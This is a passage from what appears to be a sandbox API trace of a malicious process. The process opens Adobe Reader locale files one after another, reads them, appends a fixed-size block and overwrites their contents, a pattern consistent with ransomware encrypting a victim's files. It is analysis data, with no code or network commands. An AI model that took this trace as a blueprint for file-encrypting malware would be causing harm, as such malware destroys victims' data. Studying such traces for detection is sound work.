lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0070.865] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0070.865] ReleaseMutex (hMutex=0x168) returned 1 [0070.866] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IA32.EUQ", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0070.866] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IA32.EUQ", cchWideChar=8, lpMultiByteStr=0x1f7328c, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IA32.EUQ", lpUsedDefaultChar=0x0) returned 8 [0070.866] ReadFile (in: hFile=0x1fc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0xe00, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x345f2bc*=0xe00, lpOverlapped=0x0) returned 1 [0071.009] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0071.009] WriteFile (in: hFile=0x1fc, lpBuffer=0x1e978d8*, nNumberOfBytesToWrite=0x1388, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1e978d8*, lpNumberOfBytesWritten=0x345f2d0*=0x1388, lpOverlapped=0x0) returned 1 [0071.009] CloseHandle (hObject=0x1fc) returned 1 [0071.010] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\eu_ES\\SaveAsRTF.EUQ" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\eu_es\\saveasrtf.euq"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0071.064] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0071.064] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x4a00 [0071.064] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0071.064] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0071.064] ReleaseMutex (hMutex=0x168) returned 1 [0071.064] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SaveAsRTF.EUQ", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0071.064] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SaveAsRTF.EUQ", cchWideChar=13, lpMultiByteStr=0x1f7346c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SaveAsRTF.EUQ", lpUsedDefaultChar=0x0) returned 13 [0071.064] ReadFile (in: hFile=0x1fc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0071.084] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x3a00 [0071.084] ReadFile (in: hFile=0x1fc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0071.098] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x3a00 [0071.099] WriteFile (in: hFile=0x1fc, lpBuffer=0x1e978d8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e978d8*, lpNumberOfBytesWritten=0x345f28c*=0x1588, lpOverlapped=0x0) returned 1 [0071.099] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f2bc*=0) returned 0x0 [0071.099] WriteFile (in: hFile=0x1fc, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x345f28c*=0x1000, lpOverlapped=0x0) returned 1 [0071.100] CloseHandle (hObject=0x1fc) returned 1 [0071.104] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\fi_FI\\accessibility.SUO" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\fi_fi\\accessibility.suo"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0071.106] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0071.106] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0xa600 [0071.106] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0071.106] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0071.106] ReleaseMutex (hMutex=0x168) returned 1 [0071.106] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="accessibility.SUO", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0071.106] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="accessibility.SUO", cchWideChar=17, lpMultiByteStr=0x1f88b2c, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="accessibility.SUO", lpUsedDefaultChar=0x0) returned 17 [0071.106] ReadFile (in: hFile=0x1fc, lpBuffer=0x1e93878, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesRead=0x345f278*=0x4000, lpOverlapped=0x0) returned 1 [0071.113] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x9600 [0071.113] ReadFile (in: hFile=0x1fc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0071.114] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x9600 [0071.115] WriteFile (in: hFile=0x1fc, lpBuffer=0x1e978d8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e978d8*, lpNumberOfBytesWritten=0x345f28c*=0x1588, lpOverlapped=0x0) returned 1 [0071.115] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f2bc*=0) returned 0x0 [0071.115] WriteFile (in: hFile=0x1fc, lpBuffer=0x2662a08*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x2662a08*, lpNumberOfBytesWritten=0x345f28c*=0x4000, lpOverlapped=0x0) returned 1 [0071.115] CloseHandle (hObject=0x1fc) returned 1 [0071.119] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\fi_FI\\eBook.SUO" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\fi_fi\\ebook.suo"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0071.125] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0071.125] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x1a00 [0071.125] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0071.125] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0071.126] ReleaseMutex (hMutex=0x168) returned 1 [0071.126] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eBook.SUO", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0071.126] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eBook.SUO", cchWideChar=9, lpMultiByteStr=0x1f733cc, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eBook.SUO", lpUsedDefaultChar=0x0) returned 9 [0071.126] ReadFile (in: hFile=0x1fc, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1a00, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x345f2bc*=0x1a00, lpOverlapped=0x0) returned 1 [0071.128] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0071.128] WriteFile (in: hFile=0x1fc, lpBuffer=0x1e93878*, nNumberOfBytesToWrite=0x1f88, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesWritten=0x345f2d0*=0x1f88, lpOverlapped=0x0) returned 1 [0071.129] CloseHandle (hObject=0x1fc) returned 1 [0071.130] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\fi_FI\\ReadOutLoud.SUO" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\fi_fi\\readoutloud.suo"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0071.130] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0071.130] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x2a00 [0071.130] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0071.131] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0071.131] ReleaseMutex (hMutex=0x168) returned 1 [0071.131] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ReadOutLoud.SUO", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0071.131] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ReadOutLoud.SUO", cchWideChar=15, lpMultiByteStr=0x1f7342c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ReadOutLoud.SUO", lpUsedDefaultChar=0x0) returned 15 [0071.131] ReadFile (in: hFile=0x1fc, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0071.134] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x1a00 [0071.135] ReadFile (in: hFile=0x1fc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0071.161] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x1a00 [0071.161] WriteFile (in: hFile=0x1fc, lpBuffer=0x1e978d8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e978d8*, lpNumberOfBytesWritten=0x345f28c*=0x1588, lpOverlapped=0x0) returned 1 [0071.161] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f2bc*=0) returned 0x0 [0071.162] WriteFile (in: hFile=0x1fc, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x345f28c*=0x1000, lpOverlapped=0x0) returned 1 [0071.162] CloseHandle (hObject=0x1fc) returned 1 [0071.168] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\fi_FI\\updater.SUO" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\fi_fi\\updater.suo"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0071.169] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0071.169] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x2800 [0071.169] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0071.169] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0071.170] ReleaseMutex (hMutex=0x168) returned 1 [0071.170] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="updater.SUO", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0071.170] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="updater.SUO", cchWideChar=11, lpMultiByteStr=0x1f7346c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="updater.SUO", lpUsedDefaultChar=0x0) returned 11 [0071.170] ReadFile (in: hFile=0x1fc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0071.406] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x1800 [0071.406] ReadFile (in: hFile=0x1fc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0071.445] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x1800 [0071.446] WriteFile (in: hFile=0x1fc, lpBuffer=0x2867a88*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x2867a88*, lpNumberOfBytesWritten=0x345f28c*=0x1588, lpOverlapped=0x0) returned 1 [0071.446] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f2bc*=0) returned 0x0 [0071.446] WriteFile (in: hFile=0x1fc, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x345f28c*=0x1000, lpOverlapped=0x0) returned 1 [0071.446] CloseHandle (hObject=0x1fc) returned 1 [0071.447] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\fr_FR\\DigSig.FRA" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\fr_fr\\digsig.fra"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0071.493] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0071.493] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x21c00 [0071.493] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0071.494] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0071.494] ReleaseMutex (hMutex=0x168) returned 1 [0071.494] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DigSig.FRA", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0071.494] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DigSig.FRA", cchWideChar=10, lpMultiByteStr=0x1f7328c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DigSig.FRA", lpUsedDefaultChar=0x0) returned 10 [0071.494] ReadFile (in: hFile=0x1fc, lpBuffer=0x2662a08, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x2662a08*, lpNumberOfBytesRead=0x345f278*=0x8000, lpOverlapped=0x0) returned 1 [0071.511] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x20c00 [0071.511] ReadFile (in: hFile=0x1fc, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0071.528] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x20c00 [0071.529] WriteFile (in: hFile=0x1fc, lpBuffer=0x1e90018*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesWritten=0x345f28c*=0x1588, lpOverlapped=0x0) returned 1 [0071.529] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f2bc*=0) returned 0x0 [0071.529] WriteFile (in: hFile=0x1fc, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x345f28c*=0x8000, lpOverlapped=0x0) returned 1 [0071.530] CloseHandle (hObject=0x1fc) returned 1 [0071.530] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\fr_FR\\PPKLITE.FRA" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\fr_fr\\ppklite.fra"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ec [0071.551] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0071.551] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x88000 [0071.551] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0071.552] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0071.552] ReleaseMutex (hMutex=0x168) returned 1 [0071.552] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PPKLITE.FRA", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0071.552] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PPKLITE.FRA", cchWideChar=11, lpMultiByteStr=0x1f7328c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PPKLITE.FRA", lpUsedDefaultChar=0x0) returned 11 [0071.552] ReadFile (in: hFile=0x1ec, lpBuffer=0x25a0018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x345f278*=0xf000, lpOverlapped=0x0) returned 1 [0071.560] ReadFile (in: hFile=0x1ec, lpBuffer=0x25a0018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0071.572] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x87000 [0071.573] ReadFile (in: hFile=0x1ec, lpBuffer=0x286ef88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x286ef88*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0071.584] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x87000 [0071.584] WriteFile (in: hFile=0x1ec, lpBuffer=0x2864a58*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x2864a58*, lpNumberOfBytesWritten=0x345f28c*=0x1588, lpOverlapped=0x0) returned 1 [0071.585] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f2bc*=0) returned 0x0 [0071.585] WriteFile (in: hFile=0x1ec, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x345f28c*=0xf000, lpOverlapped=0x0) returned 1 [0071.585] WriteFile (in: hFile=0x1ec, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x345f28c*=0x1000, lpOverlapped=0x0) returned 1 [0071.586] CloseHandle (hObject=0x1ec) returned 1 [0071.586] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\fr_FR\\Services\\Services.asfx" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\fr_fr\\services\\services.asfx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ec [0071.587] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0071.587] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0xe6 [0071.587] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0071.587] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0071.587] ReleaseMutex (hMutex=0x168) returned 1 [0071.587] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Services.asfx", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, 